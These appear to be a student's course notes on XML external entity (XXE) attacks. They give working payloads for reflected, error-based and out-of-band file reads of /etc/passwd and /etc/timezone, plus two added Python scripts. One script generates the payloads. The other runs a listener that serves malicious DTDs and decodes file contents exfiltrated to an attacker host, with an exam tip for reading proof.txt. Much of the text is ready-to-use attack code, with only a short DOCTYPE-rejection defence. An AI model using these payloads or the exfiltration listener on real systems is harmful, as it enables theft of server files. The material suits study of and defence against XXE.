1. To include literal < and > (or &) inside XML data without the parser treating them as markup, wrap the whole value in a CDATA section:
<![CDATA[ content that contains < or > ]]>
2. Types of XML entities:
Internal (replacement text given inline in the DTD) - <!ENTITY test "<entity-value>test value</entity-value>"> or <!ENTITY test "value">
Private External (private because of SYSTEM; the replacement text is fetched from the URI, which is what XXE abuses) - <!ENTITY offsecinfo SYSTEM "http://www.offsec.com/company.xml">
Public External (public because of PUBLIC; the public identifier comes first, the URI second) - <!ENTITY offsecinfo PUBLIC "-//W3C//TEXT companyinfo//EN" "http://www.offsec.com/companyinfo.xml">
Parameter (usable only inside the DTD and referenced as %name; instead of &name;; in this example %course; expands to WEB 200) - <!ENTITY % course 'WEB 200'>
3. Results directly reflected (in-band: the entity's replacement text comes back in the response):
Original:
<?xml version="1.0" encoding="UTF-8"?><entity-engine-xml> <Product createdStamp="2021-06-29 16:01:57.355" createdTxStamp="2021-06-29 16:01:55.979" description="Giant Widget with Wheels" internalName="Giant Widget variant explosion" isVariant="N" isVirtual="Y" largeImageUrl="/images/products/WG-9943/large.png" lastUpdatedStamp="2021-06-29 16:02:40.282" lastUpdatedTxStamp="2021-06-29 16:02:40.019" longDescription="This giant widget is mobile. It will seat one person safely. The wheels will never rust or break. Quite a unique item." primaryProductCategoryId="202" productId="WG-9943" productName="Giant Widget with variant explosion" productTypeId="FINISHED_GOOD" productWeight="22.000000" quantityIncluded="10.000000" smallImageUrl="/images/products/WG-9943/small.png" virtualVariantMethodEnum="VV_VARIANTTREE"/> <Product createdStamp="2021-06-29 16:01:57.985" createdTxStamp="2021-06-29 16:01:55.979" description="Black Giant Widget with 3 Wheels" internalName="Giant Widget B3" isVariant="Y" isVirtual="N" lastUpdatedStamp="2021-06-29 16:02:09.366" lastUpdatedTxStamp="2021-06-29 16:02:02.981" longDescription="This giant widget is mobile. It will seat one person safely. The wheels will never rust or break. Quite a unique item." primaryProductCategoryId="202" productId="WG-9943-B3" productName="Giant Widget B3" productTypeId="FINISHED_GOOD" productWeight="22.000000" quantityIncluded="10.000000"/> <Product createdStamp="2021-06-29 16:01:59.09" createdTxStamp="2021-06-29 16:01:55.979" internalName="Round Gizmo" isVariant="N" isVirtual="N" largeImageUrl="/images/products/GZ-2644/large.png" lastUpdatedStamp="2021-06-29 16:02:32.639" lastUpdatedTxStamp="2021-06-29 16:02:32.431" longDescription="A small round gizmo with multi-colored lights. Works great in the dark. Small and compact." 
primaryProductCategoryId="101" productId="GZ-2644" productTypeId="FINISHED_GOOD" productWeight="7.000000" quantityIncluded="100.000000" smallImageUrl="/images/products/GZ-2644/small.png"/> </entity-engine-xml>
Modified:
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY xxe "Vulnerable to XXE">
]><entity-engine-xml><Product createdStamp="2021-06-29 16:01:57.355" createdTxStamp="2021-06-29 16:01:55.979" description="Giant Widget with Wheels" internalName="Giant Widget variant explosion" isVariant="N" isVirtual="Y" largeImageUrl="/images/products/WG-9943/large.png" lastUpdatedStamp="2021-06-29 16:02:40.282" lastUpdatedTxStamp="2021-06-29 16:02:40.019" primaryProductCategoryId="202" productId="TEST-1234" productName="Giant Widget with variant explosion" productTypeId="FINISHED_GOOD" productWeight="22.000000" quantityIncluded="10.000000" smallImageUrl="/images/products/WG-9943/small.png" virtualVariantMethodEnum="VV_VARIANTTREE"><longDescription>&xxe;</longDescription></Product></entity-engine-xml>
Modified the following:
a. The <?xml ...?> declaration on the first line is optional, so it was removed.
b. Added <!DOCTYPE data [, <!ELEMENT data ANY > and <!ENTITY xxe "Vulnerable to XXE"> in front of the document (a non-validating parser does not care that the DOCTYPE name differs from the root element).
c. Removed longDescription from the Product tag's attributes and added it as a separate longDescription child element, so that &xxe; sits in element content. This matters for the next step: an internal entity such as "Vulnerable to XXE" also expands inside an attribute value, but XML forbids references to external (SYSTEM) entities in attribute values, so the file-read version only works from element content.
d. Removed the forward slash (/) at the end of the Product tag and closed it manually with </Product> so that the new longDescription element is inside Product.
To read a local file instead, change <!ENTITY xxe "Vulnerable to XXE"> to:
<!ENTITY xxe SYSTEM "file:///etc/passwd">
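Added example (my own code, not from the course or the page): a Python script that applies edits (a)-(d) above to a captured request body, checks what an entity-expanding parser hands back for the probe, and shows the parser-side fix (refuse any DOCTYPE). The product XML inside is a constructed, trimmed stand-in with the page's element and attribute names; ORIGINAL, the function names and the placeholder string are assumptions of this example.

```python
import re
import xml.etree.ElementTree as ET
from xml.parsers import expat

# Constructed stand-in for the product export shown above (assumption: same
# element and attribute names as the page, trimmed to a few attributes).
ORIGINAL = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<entity-engine-xml>'
    '<Product productId="WG-9943" productName="Giant Widget with Wheels" '
    'longDescription="This giant widget is mobile." productTypeId="FINISHED_GOOD"/>'
    '</entity-engine-xml>'
)

INTERNAL_ENTITY = '<!ENTITY xxe "Vulnerable to XXE">'      # step 3 probe
FILE_ENTITY = '<!ENTITY xxe SYSTEM "file:///etc/passwd">'  # step 3 file read
_PLACEHOLDER = "__XXE_REF__"                               # swapped for &xxe; after serialising


def make_reflected_payload(original, entity_decl, field="longDescription"):
    """Apply edits (a)-(d) from the page to a captured request body."""
    body = re.sub(r"^\s*<\?xml[^>]*\?>", "", original)      # (a) the declaration is optional
    root = ET.fromstring(body)
    product = root.find("Product")
    product.attrib.pop(field, None)                          # (c) drop the attribute ...
    child = ET.SubElement(product, field)                    #     ... and re-add it as a child
    child.text = _PLACEHOLDER                                # tostring() would escape a literal &xxe;
    serialized = ET.tostring(root, encoding="unicode")       # (d) Product now gets an explicit </Product>
    doctype = "<!DOCTYPE data [\n<!ELEMENT data ANY >\n" + entity_decl + "\n]>"  # (b)
    return doctype + serialized.replace(_PLACEHOLDER, "&xxe;")


def reflected_value(payload, field="longDescription"):
    """Simulate a parser that expands entities and return what comes back in `field`.
    The stdlib expat parser expands internal entities, so the marker round-trips.
    It does not fetch external entities (the SYSTEM variant is reported as an
    undefined entity here); a libxml2-based parser with entity resolution left
    on, such as lxml's default XMLParser, would return the file contents instead."""
    root = ET.fromstring(payload)
    return root.find("Product/" + field).text


def has_doctype(document):
    """Hardened side: detect a DTD before parsing. Rejecting any DOCTYPE removes
    internal, external and parameter entities with a single check."""
    seen = []
    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = lambda name, sysid, pubid, has_internal: seen.append(name)
    parser.Parse(document, True)
    return bool(seen)


def parse_untrusted(document):
    """Parse a request body only if it carries no DTD."""
    if has_doctype(document):
        raise ValueError("DOCTYPE/DTD not allowed in untrusted XML")
    return ET.fromstring(document)


if __name__ == "__main__":
    probe = make_reflected_payload(ORIGINAL, INTERNAL_ENTITY)
    print(probe)
    print("reflected:", reflected_value(probe))
    print("file-read payload:\n" + make_reflected_payload(ORIGINAL, FILE_ENTITY))
```

Run it to get the probe body and the file-read body for the captured request; the same has_doctype() check is what the application side should apply before parsing anything from the client.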
4. Error based (the entity is placed in a field the application then rejects, usually because the expanded value is too long or not the expected type, and the error message echoes the rejected value; if one parameter does not produce an error, try another):
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<entity-engine-xml>
<Product createdTxStamp="2021-06-04 08:15:48.983" internalName="Giant Widget variant explosion" isVariant="N" isVirtual="Y" largeImageUrl="/images/products/WG-9943/large.png" lastUpdatedStamp="2021-06-04 08:16:18.521" lastUpdatedTxStamp="2021-06-04 08:16:18.258" primaryProductCategoryId="202" productId="XXE-0001" productName="Giant Widget with variant explosion" productTypeId="FINISHED_GOOD" productWeight="22.000000" quantityIncluded="10.000000" smallImageUrl="/images/products/WG-9943/small.png" virtualVariantMethodEnum="VV_VARIANTTREE">
<createdStamp>2021-06-04 08:15:49</createdStamp>
<description>&xxe;</description>
<longDescription>XXE</longDescription>
</Product>
</entity-engine-xml>
Alternative error based (parameter-entity version; put these lines in an external DTD fetched as in step 5, since parameter-entity references inside a declaration are not allowed in the internal subset of the DOCTYPE; the parser fails to open the nonexistent path and its error message repeats that path, file content included; if the parser rejects the nested declaration, write its inner % as &#x25;, because a bare % inside an entity value must begin a parameter-entity reference):
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
5. Out of band:
a. Create a file named external.dtd (the file is read on the victim when %content; is expanded, and its contents travel to your host in the URL of the exfil entity):
<!ENTITY % content SYSTEM "file:///etc/timezone">
<!ENTITY % external "<!ENTITY % exfil SYSTEM 'http://your ip address/out?%content;'>" >
b. At the vulnerable page (parameter-entity references such as %base;, %external; and %exfil; are only recognised inside the DTD, so they must stay within the DOCTYPE brackets):
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE oob [
<!ENTITY % base SYSTEM "http://your ip address/external.dtd">
%base;
%external;
%exfil;
]>
<entity-engine-xml>
</entity-engine-xml>
c. Copy external.dtd to /var/www/html, then sudo systemctl start apache2; afterwards sudo tail /var/log/apache2/access.log to see the results: the victim's request for /out?<contents of the file> shows up in the log, URL-encoded. Use single-line files for this channel, since newlines and many other characters are not valid in a URL and break the callback.
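Added example (my own code, not from the course or the page) that serves step 4's alternative error-based DTD and step 5's external.dtd from one listener and decodes the /out callback, replacing apache2 plus tail of access.log. The listener binds 127.0.0.1 with an OS-chosen port (8000 in the demo), the /error.dtd path is my own addition, the nested % inside the entity values is written as &#x25; so the outer entity value is well-formed, and the Apache log line used with decode_access_log() is constructed; all of these are assumptions of this example.

```python
import re
import threading
import urllib.parse
import http.client
from http.server import BaseHTTPRequestHandler, HTTPServer

TARGET = "file:///etc/timezone"   # one-line file: its contents have to fit in a URL


def build_external_dtd(listener, target=TARGET):
    """external.dtd from step 5a with the listener address filled in. %content; is
    expanded on the victim when it processes %external;, so the victim reads the
    file and sends it to us in the URL of the exfil entity."""
    return (
        f'<!ENTITY % content SYSTEM "{target}">\n'
        f'<!ENTITY % external "<!ENTITY &#x25; exfil SYSTEM '
        f"'http://{listener}/out?%content;'>\">\n"
    )


def build_error_dtd(target="file:///etc/passwd"):
    """Parameter-entity error-based variant from step 4: the fetch of the
    nonexistent path fails and the error message carries the path, contents included."""
    return (
        f'<!ENTITY % file SYSTEM "{target}">\n'
        '<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM \'file:///nonexistent/%file;\'>">\n'
        "%eval;\n%error;\n"
    )


def build_victim_document(listener):
    """Request body for step 5b; the parameter-entity references stay inside the DOCTYPE."""
    return (
        '<?xml version="1.0" encoding="utf-8"?>\n<!DOCTYPE oob [\n'
        f'<!ENTITY % base SYSTEM "http://{listener}/external.dtd">\n'
        "%base;\n%external;\n%exfil;\n]>\n<entity-engine-xml>\n</entity-engine-xml>\n"
    )


def decode_access_log(line):
    """Step 5c done by hand: recover the URL-encoded value from an Apache access.log line."""
    m = re.search(r'"GET /out\?([^ "]*) HTTP/', line)
    return urllib.parse.unquote(m.group(1)) if m else None


class ExfilHandler(BaseHTTPRequestHandler):
    """Serves the DTDs and records anything that arrives on /out."""
    def do_GET(self):
        url = urllib.parse.urlsplit(self.path)
        if url.path == "/external.dtd":
            self._send(200, build_external_dtd(self.server.listener))
        elif url.path == "/error.dtd":
            self._send(200, build_error_dtd())
        elif url.path == "/out":
            value = urllib.parse.unquote(url.query)   # unquote, not unquote_plus: keep '+' literal
            self.server.received.append(value)
            print("exfiltrated:", value)
            self._send(200, "")
        else:
            self._send(404, "")

    def _send(self, status, body):
        data = body.encode()
        self.send_response(status)
        self.send_header("Content-Type", "application/xml-dtd")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):   # results are collected in server.received instead
        pass


class ExfilServer(HTTPServer):
    """Replacement for apache2 + tail access.log: serves the DTDs and decodes the callback."""
    def __init__(self, host="127.0.0.1", port=0):      # port 0: let the OS pick one
        super().__init__((host, port), ExfilHandler)
        self.listener = f"{host}:{self.server_port}"
        self.received = []

    def start(self):
        threading.Thread(target=self.serve_forever, daemon=True).start()
        return self.listener


def fetch(listener, path):
    """Tiny client standing in for the victim's parser (used to exercise the listener)."""
    host, port = listener.split(":")
    conn = http.client.HTTPConnection(host, int(port), timeout=5)
    conn.request("GET", path)
    resp = conn.getresponse()
    return resp.status, resp.read().decode()


if __name__ == "__main__":
    server = ExfilServer(port=8000)   # assumption: port 8000 is free on this host
    print("send this to the vulnerable page:\n" + build_victim_document(server.listener))
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        pass
```

Point the victim at http://<listener>/external.dtd for the out-of-band channel or at /error.dtd for the error-based variant; whatever the victim's parser appends to /out? is printed decoded as it arrives.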
6. Exam? Try file:///proof.txt